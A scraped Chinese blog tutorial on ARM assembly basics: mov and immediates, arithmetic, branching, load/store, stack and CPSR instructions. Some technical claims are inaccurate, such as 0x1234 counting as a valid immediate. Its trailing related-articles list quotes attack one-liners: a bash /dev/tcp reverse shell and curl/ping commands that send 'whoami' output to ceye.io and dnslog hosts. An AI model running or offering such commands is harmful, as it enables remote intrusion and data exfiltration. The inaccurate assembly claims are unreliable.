ARM 汇编语言基础

news2024/12/25 12:59:04

目录

汇编指令代码框架

汇编指令语法格式

数据处理指令

数据搬移指令 mov

示例

立即数的本质

立即数的特点

立即数的使用

算术运算指令

指令格式

add 普通的加法指令

adc 带进位的加法指令

跳转指令

Load/Store指令

状态寄存器指令


基础概念

  1. C 语言与汇编指令的关系

    • 语句:带有分号 (;) 的 C 语言语句可以被编译成汇编指令。
    • 预处理指令:以井号 (#) 开头的行称为预处理指令,它们告诉编译器如何处理源代码。
  2. 汇编语言的整体分类

    • 指令:编译后生成一条机器码,存储在内存中供 CPU 执行。
    • 伪操作:不生成机器码也不占用内存,用于控制汇编过程。

      (相当于c中的’#‘的内容)告诉编译器怎么编译)

    • 伪指令:在编译时被替换为一系列等效的指令,用于实现某些高级功能。

      (如:cpu中没有乘法器,对应没有乘法指令,3*3 ---》用加法器实现3+3+3,替换实现)

  3. 注释

    • 单行注释:使用 @ 符号开始。
    • 多行注释:使用 /**/ 包围。
  4. 指令分类

    • 数据处理指令:对数据进行逻辑和算术运算。
    • 跳转指令:改变程序流程,即修改程序计数器 PC。
    • Load/Store 指令:读取和写入内存。
    • 状态寄存器传送指令:读写 CPSR(当前程序状态寄存器)。
    • 异常中断产生指令:触发软件中断(SWI),用于系统调用。
    • 协处理器指令:操作协处理器,比如浮点运算单元 FPU。

汇编指令代码框架

.text
.global _start
_start:
    ; 汇编代码段
.end

汇编指令语法格式

<opcode><code>{s} Rd, Rn, operand2
  • opcode:指令名称。
  • code:条件码,可选,默认无条件执行。
  • s:是否更新 CPSR 的标志位。
  • Rd:目标寄存器。
  • Rn:第一个操作寄存器。
  • operand2:第二个操作数,可以是寄存器或立即数。
  • 注:指令的名字,条件码,s连到一起写,指令名和目标寄存器之间使用空格,寄存器和数据之间使用逗号隔开,指令中的字符不区分大小写

数据处理指令

数据搬移指令 mov

  • 格式<opcode><code>{s} Rd, operand2
  • 立即数形式mov{<code>}{s} Rd, #immediate
示例

在这个示例中,我们首先声明了一个 .text 段,然后定义了一个全局符号 _start,这是程序的入口点。接下来我们初始化寄存器 R00x1234,然后将 R0 的值复制给 R1。最后,通过 bx lr 返回到调用者

.text
.global _start

_start:
    ; 初始化寄存器 R0 为 0x1234
    mov r0, #0x1234
    ; 将 R0 的值移动到 R1
    mov r1, r0
    ; 结束程序
    bx lr

.end
  • 1》数据搬移指令 mov
  • @ 格式:<opcode><code>{s} Rd, oprand2
  • 如果是立即数,前边必须加#

PC寄存器详细讲解:

指令的执行三步:取,译码,执行(PC永远指向当前正在取指指令的地址)。

立即数在 ARM 汇编语言中是一个重要的概念。立即数是直接编码在指令中的数值,它与普通变量不同,后者通常存储在内存中。下面是关于立即数的一些详细说明和优化后的格式:

立即数的本质

立即数是直接嵌入在指令中的数据,作为指令的一部分。这意味着当指令被加载到处理器中时,立即数也会同时被加载。

立即数的特点

  • 优点
    • 快速访问:因为立即数是与指令一同加载的,所以不需要额外的时间去内存中获取。
    • 节省空间:如果立即数足够小,那么可以减少对寄存器的需求,从而节省空间。
  • 缺点
    • 数量有限:立即数的大小受到指令格式的限制,ARM 架构中立即数通常被限制在一定范围内。
    • 表达能力受限:由于立即数大小的限制,有时候无法直接表示较大的数值。

立即数的使用

在 ARM 汇编语言中,立即数通常用于简单的数值操作,例如赋值或者与寄存器进行逻辑运算。立即数只能是某些特定的值,并且这些值通常被限制为可以由指令直接处理的形式。

如:MOV ,#0x12345678 @报错,不合法

对于 mov 指令而言,立即数必须是一个可以通过位移得到的 8 位值。这意味着立即数必须是 2 的幂次方的倍数,并且最大不超过 255。例如, 0x1234 是一个有效的立即数,因为它可以通过位移得到。但是 0x12345678 则不是一个有效的立即数,因为它超过了 8 位的限制,并且不能通过简单的位移得到。

注:使用mov 给寄存器里面存放值的时候,#号后面需是有效数(1:立即数,2:取反之后是立即数),如果不是立即数需要用ldr指令进行存放。

算术运算指令

常见的算术运算指令包括:

  • add:加法
  • adc:带进位的加法
  • sub:减法
  • sbc:带借位的减法
  • mul:乘法

指令格式

算术运算指令的一般格式如下:

<opcode>{<code>}{s} Rd, Rn, operand2

其中:

  • <opcode> 是指令名称。
  • <code> 是条件码,可选。
  • {s} 表示是否更新 CPSR 的标志位。
  • Rd 是目标寄存器。
  • Rn 是第一个操作寄存器。
  • operand2 是第二个操作数,可以是寄存器或立即数。
add 普通的加法指令

adc 带进位的加法指令

假设2个64位的数相加

  • 第一个64位的数,R0存放低32位,R1存放高32位,
  • 第二个64位的数,R2存放低32位,R3存放高32位
  • 结果R4存放低32位,R5存放高32位

add和ADC的区别,例如是64位的字符,如果低位大小满足进1的话用ADD只会显示在C进1,但是存储的地址并不进1,ADC的话则会将存储的地址进1

注意:mul r2, r0, #0x4 @ 错误

乘法指令的第二个操作数只能是一个寄存器

mul r2, r1,r0

跳转指令

1》修改PC,不建议使用,因为需要查询指令的地址

2》 b bl :指令跳转

  • 格式:b/bl Label
  • Label: 指令
  • 相当C语言的函数调用
  • B指令(不带返回的跳转)

不保存返回地址的跳转(返回地址不保存到lr中)

  • BL指令(带返回的跳转指令),将LR的值修改成跳转指令下一条指令的地址,再将PC的值修改成跳转标识符下指令的地址

补充了解:

RM指令条件码表:可跟的判断条件成立跳转(NZCV在用于判断两者之间关系使用比较多)

如:c代码如下:

练习:
    实现以下逻辑
		unsigned int r1 = 9;
		unsigned int r2 = 15;
		while(1)
		{
		        if(r1 == r2)
				goto stop;
			if(r1 > r2)
		            	r1 = r1 - r2;
		        if(r1 < r2)
		         	r2 = r2 - r1;
		}
	stop:
		        while(1);

汇编指令练习答案如下:
    mov r1,#9
    mov r2,#15
loop:
      cmp r1,r2  @cmp 比较指令
      beq  stop
      subhi r1,r1,r2
      subcc r2,r2,r1
      b loop
stop:
    b stop

Load/Store指令

对内存的读写操作//如 a++ 读a的值,将运算结果从cpu写道内存

可用地址查找:(我们不用查找,脚本文件中配置了内存空间的分配) 查看内存中内容:

1>单寄存器操作指令 ldr/str

  1. 格式:ldr/str Rm, [Rn]
  2. Rm: 存储是数据

Rn:存储的数据,地址

将CPU中r1寄存器中的数据存储到内存中r0地址的空间中

  • 将r0指向的地址空间中的内容,读到r2寄存器中
  • ldr r2, [r0]

  • 将r1中的值存储到r0+4指向的地址空间中,R0中的值不变
  • str r1, [r0, #4];

  • 将r2中的值存储到r0指向的地址空间中,r0 = r0 + 4
  • str r2, [r0], #4

  • 将R3中的值存储到R0+4指向的地址空间中,并且r0 = r0 + 4
  • str r3, [r0, #4]!

  • 2>多寄存器操作指令 stm ldm
  • 将r1到r4中的值存储到r0指向地址空间中,连续16个字节的地址空间
  • stm r0, {r1-r4}

  • 将r0指向的地址空间中,连续的16个字节的数据,读到r5-r8寄存器中
  • ldm r0, {r5-r8}

  • 如果寄存器列表中的寄存器编号既有连续又有不连续,连续的使用“-”隔开,不连续的使用“,”
  • stm r0, {r1-r3,r4}

  • 2. 不管寄存器列表中的寄存器编号顺序如何变化,都是小地址对应小编号的寄存器高地址对应大编号的寄存器
  • stm r0, {r4,r3,r2,r1}
  • ldm r0, {r8,r7,r6,r5}

  • 3>栈的操作指令 stmfd ldmfd
  • 栈的种类
    • 空栈(Empty)

栈指针指向的地址是空的,在栈中存储数据时,可以直接存储,存储完成之后需要将栈指针再次指向空的位置。

  • 满栈(Full)

栈指针指向的地址有数据,在栈中存储数据时,需要先将栈指针,指向一个空的位置,然后在存储数据。

  • 增栈(Ascending)

栈指针向高地址方向移动

  • 减栈(Descending)

栈指针向低地址方向移动

操作栈的方式有四种

  • 满增栈 满减栈 空增栈 空减栈
  • FA:Full Ascending 满增(FA)
  • FD:Full Descending 满减(FD)
  • EA:Empty Ascending 空增(EA)
  • ED:空减
  • ARM默认采用的是满减栈

  • stmfd/ldmfd<code> sp!, {寄存器列表}
  • stmfd sp!, {r1-r5}(写) (压栈)

更新栈指针指向的地址空间

  • ldmfd sp!, {r6-r10}(读) (出栈)

特殊:

stmfd sp!, {r1-r5,lr}(写) (压栈)

ldmfd sp!, {r6-r10,pc}(读) (出栈) //r1-r5出栈给r6-r10, 将lr的值出栈给pc

状态寄存器指令

对CPSR进行读写操作//其他都不能动CPSR (SWI 指令是linux内核有,所以arm为了匹配才有的指令)(CPSR保存cpu的状态、模式、中断中断开关、运算状态,非常重要,不能任意更改,只有一类指令能操作这个寄存器)

1》读cpsr 指令mrs

2》写cpsr 指令 msr :一般情况不能修改cpsr,只能用msr命令修改,user模式下不能切换到其他模式。

注:修改CPSR的控制域(bit[7:0]),修改CPSR时必须指定修改哪个区域

USER模式下不能修改CPSR的值,防止应用程序修改CPU状态,保护操作系统

CPSR_C修改的是CPSR的低八位ctrl(控制)域,一般都只修改C域

OK,就分享到这,如果帮到你那就点个关注吧~

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1987196.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

日志和守护进程

日志 //日志就是服务器在运行的时候要定期的把执行痕迹保留下来 #pragma once #include <iostream> #include <string> #include <cstdio> #include <cstring> #include <ctime> #include <cstdarg> #include <sys/types.h> #inclu…

XFS寻址模拟

XFS寻址 XFS 大部分时候都会用绝对地址&#xff0c;即包含AG信息和相对AG偏移量的信息&#xff0c;但有些时候会使用相对地址“相对AG的偏移量” [rootip-172-31-35-68 ~]# xfs_db -r /dev/nvme1n1 xfs_db> sb 0 xfs_db> p magicnum 0x58465342 blocksize 4096 dbloc…

丰富IO接口的ARMxy工业计算机在装卸机中的应用

在工业装卸领域&#xff0c;高效、精准的装卸作业对于提高生产效率和降低成本至关重要。ARMxy 工业计算机凭借其丰富的 IO 接口和强大的性能&#xff0c;成为工业装卸机的智能控制核心&#xff0c;为装卸作业带来了全新的变革。 ARMxy 工业计算机自带丰富的 IO 接口&#xff0c…

【C++】4.类和对象(2)

文章目录 1.类的默认成员函数2.构造函数 1.类的默认成员函数 默认成员函数就是用户没有显式实现&#xff0c;编译器会自动生成的成员函数称为默认成员函数。一个类&#xff0c;我们不写的情况下编译器会默认生成以下6个默认成员函数&#xff0c;需要注意的是这6个中最重要的是前…

解决戴尔台式电脑休眠后无法唤醒问题

近期发现有少量戴尔的台式机会有休眠后无法唤醒的问题&#xff0c;具体现象就是电脑在休眠后&#xff0c;电源指示灯以呼吸的频率闪烁&#xff0c;无论怎么点鼠标和键盘都没有反应&#xff0c;并且按开机按钮也没法唤醒&#xff0c;只能是长按开机键强制关机再重启才行&#xf…

Jboss漏洞

三、Jboss 3.1 CVE-2015-7501 Jboss JMXInvokerServlet 反序列化漏洞 漏洞复现 1.POC&#xff0c;访问地址 /invoker/JMXInvokerServlet返回如下&#xff0c;说明接口开放&#xff0c;此接口存在反序列化漏洞 3.1 8080 工具 bash -i>& /dev/tcp/ip/4444 0>&…

Python | Leetcode Python题解之第327题区间和的个数

题目&#xff1a; 题解&#xff1a; class Solution:def countRangeSum(self, nums: List[int], lower: int, upper: int) -> int:pre list(accumulate(nums, initial0))nums sorted(pre)mx len(nums)b BIT(mx 1)ans 0# 统计[x-upper,x-lower]的个数for i, x in enum…

sql注入靶场搭建

1.安装小皮面板&#xff08;PhpStudy&#xff09; 1.从官网下载&#xff1a;http://www.xp.cn 2、Sqli-labs环境安装 准备好sqli-labs-php7-master文件 3.安装之前确保本地没有下载mysql服务器 如果电脑下载了MySQL可以把MySQL的服务停掉 此电脑>右键>管理>服务…

wordpress漏洞复现

首先打开环境 点击【外观】——>【编辑】选择404.php并将文件改为我们的一句话木马 然后我们访问刚刚修改的文件内容说明我们注入成功就可以了

k8s创建secret并在container中获取secret

k8s创建secret并在container中获取secret 本文使用的deployment和service与我的上一篇文章一样。link也放在下面了&#xff0c;如果不懂什么事deployment和service&#xff0c;可以先看我的上一篇文章。 k8s使用kustomize来部署应用 下面我们将通过创建secret开始。secret是我…

C++ exe程序内存占用分析之Linux篇

基础分析 git clone --recursive https://github.com/google/bloatycd bloatygit submodule updatemkdir buildcd buildcmake ..make -j8bloaty bloatyFILE SIZE VM SIZE -------------- --------------35.5% 16.9Mi 0.0% 0 .debug_info25.2% 12.0Mi…

代码随想录27期|Python|Day38|509斐波那契|738.爬楼梯|746.746. 使用最小花费爬楼梯

贴一下动态规划的步骤&#xff08;5步&#xff09;&#xff0c;就像是之前递归一样&#xff0c;需要每次落实到位。 确定dp数组&#xff08;dp table&#xff09;以及下标的含义确定递推公式dp数组如何初始化确定遍历顺序举例推导dp数组 ​​​​​509. 斐波那契 注意到n的范…

WEB渗透Web突破篇-命令执行

命令执行 >curl http://0ox095.ceye.io/whoami >ping whoami.b182oj.ceye.io >ping %CD%.lfofz7.dnslog.cn & cmd /v /c "whoami > temp && certutil -encode temp temp2 && findstr /L /V "CERTIFICATE" temp2 > temp3 &…

在网页上进行 3D 产品展示的开发需要用到哪些器材和技术?

问题补充&#xff1a; 3D产品展示就是根据用户输入的数据&#xff0c;比如身高&#xff0c;体重&#xff0c;爱好等等的信息在网页上形成一个3D的人体模型&#xff0c;并根据网站的数据库自动为用户挑选合适的衣服并展示在生成的3D模型上。 在网页上进行3D产品展示的开发&…

在idea中将JDK17换成JDK8

五步&#xff1a;&#xff08;改五个地方&#xff09; pom文件&#xff1a; 1&#xff1a;SpringBoot版本改成2.多 2&#xff1a;jdk版本改成8 3&#xff1a;蓝框中的数字改成1.8. 4&#xff1a;SDK改成1.8 5&#xff1a;红框内数字改成8

gin-vue-admin框架遇到AxiosError:Network Error怎么解决?

flipped-aurora/gin-vue-admin: &#x1f680;ViteVue3Gin的开发基础平台&#xff0c;支持TS和JS混用。它集成了JWT鉴权、权限管理、动态路由、显隐可控组件、分页封装、多点登录拦截、资源权限、上传下载、代码生成器【可AI辅助】、表单生成器和可配置的导入导出等开发必备功能…

HTML5+CSS3笔记(Xmind格式):第三天

Xmind鸟瞰图&#xff1a; 简单文字总结&#xff1a; 过渡 transition: 过渡属性 过渡时间 运动曲线 何时开始 2D变形transform &#xff1a; 1.平移&#xff1a;translate(单位px) 2.缩放&#xff1a;scale(默认1&#xff0c;大于1放大&#xff0c;小于1缩小) 3…

Laravel 使用Excel导出的文件中,指定列数据格式为日期,方便后期的数据筛选操作

背景 最近&#xff0c;后台运维要求导出的 Excel文件&#xff0c;对于时间的筛选&#xff0c;能满足年份、月份的选择 通过了解&#xff0c;发现&#xff1a; 先前导出的文件&#xff0c;默认列数据都是字符串&#xff08;文本&#xff09;格式 同时&#xff0c;因为用的是 Lar…

H3C MSR NAT66配置指北

正文共&#xff1a;1456 字 14 图&#xff0c;预估阅读时间&#xff1a;1 分钟 通过前面的介绍&#xff08;企业路由器配置IPv6家用宽带的PPPoE拨号示例&#xff09;&#xff0c;想必你已经可以实现让MSR路由器通过PPPoE拨号接入IPv6网络。 正常来讲&#xff0c;通过前面的配置…

PLSQL 无客户端连接服务器设置

文章目录 1 概述1.1 使用场景 2 步骤2.1 下载 PLSQL 客户端2.2 观察 工具-首选项-OCI库&#xff08;自动检测为空&#xff09;2.3 下载 instantclient2.4 配置环境变量2.5 配置 PLSQL 3 测试 1 概述 1.1 使用场景 场景&#xff1a;只需要连接服务器上的 Oracle&#xff0c;而…